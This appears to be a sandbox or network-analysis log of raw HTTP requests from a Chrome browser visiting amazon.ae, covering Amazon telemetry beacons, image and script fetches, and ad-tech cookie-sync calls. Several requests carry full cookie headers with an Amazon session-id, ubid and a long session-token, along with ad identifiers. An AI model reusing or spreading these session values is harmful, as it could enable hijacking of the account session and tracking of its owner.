    Source: global trafficHTTP traffic detected: GET /v1/get_or_create?gdpr_consent=&domid=1106 HTTP/1.1Host: cookie-matching.mediarithmics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync/put/amazon?amazonid=55baee24-b702-4cc6-ad0d-99fabac100f1&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D55baee24-b702-4cc6-ad0d-99fabac100f1 HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rrum?cm_dsp_id=198&external_user_id=9wKYsJ4CT2yWvth808m3GQ&cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&gdpr_consent= HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /redir/?partnerid=145&partneruserid=9KyZq3LXQk-R65yClQbJ1g&gdpr_consent= HTTP/1.1Host: rtb-csync.smartadserver.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D3451%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D6245%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6967%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=xandrHMT&id=yzz1lUhzR0mqhMyLk0ySdw HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=improvedigitalHMT&id=56850dde-f521-4220-b5ea-d074c8f18e01&gdpr_consent= HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /setuid?bidder=amazon&uid=8poFqPWQSFuFTsVd_7LTSA&gdpr_consent= HTTP/1.1Host: pbs.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=bluekai.com&id=$_BK_UUID HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
    Source: global trafficHTTP traffic detected: GET /sync/init/amazon?redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D%25s HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71NAHqFhGML._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81F8SVBsHYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31ULjw05G7L.js?AUIClients/AmazonLightsaberPageAssets HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81F4LPKOIBL.js?AUIClients/FWCIMAssets HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/vfqcwUkuArEiwD2.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61v-DUo-vZL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D5782%26at%3D5782%26t%3D1723729113762%26csmtags%3DbrowserQuiteMut%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5781 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26sc0%3Dp13n-rvi_desktop-rvi_0%26bb0%3D3006%26be0%3D3007%26pc0%3D4067%26ld0%3D4067%26t0%3D1723729112047%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4067 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D5786%26at%3D5786%26t%3D1723729113766%26csmtags%3DstartVL%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5785 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /lm/acs?json={%22GUID%22:%229e85d7c4-6b7e-43f3-aae7-2ea3d9bc2f05%22,%22Time%22:%2220240815T133834.841378%22}&rtu=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=sizmek&id=[%tp_UserID%] HTTP/1.1Host: lm.serving-sys.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u2=9e85d7c4-6b7e-43f3-aae7-2ea3d9bc2f054TK060
    Source: global trafficHTTP traffic detected: GET /rrum?cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&cm_dsp_id=198&external_user_id=9wKYsJ4CT2yWvth808m3GQ&gdpr_consent=&C=1 HTTP/1.1Host: dsum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CMID=Zr4E20t3ua0AAHMyAbC.vgAA; CMPS=1241; CMPRO=1241
    Source: global trafficHTTP traffic detected: GET /t/v2?tagid=V2_393725&AMAZON_REGION_SPECIFIC_ENDPOINT=aax-eu.amazon-adsystem.com/s&src.visitorID=IORp_6qgRLaPhnBlGk_r3A HTTP/1.1Host: odr.mookie1.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D127%26pc%3D5786%26at%3D5786%26t%3D1723729113766%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D3007%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D3007%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: 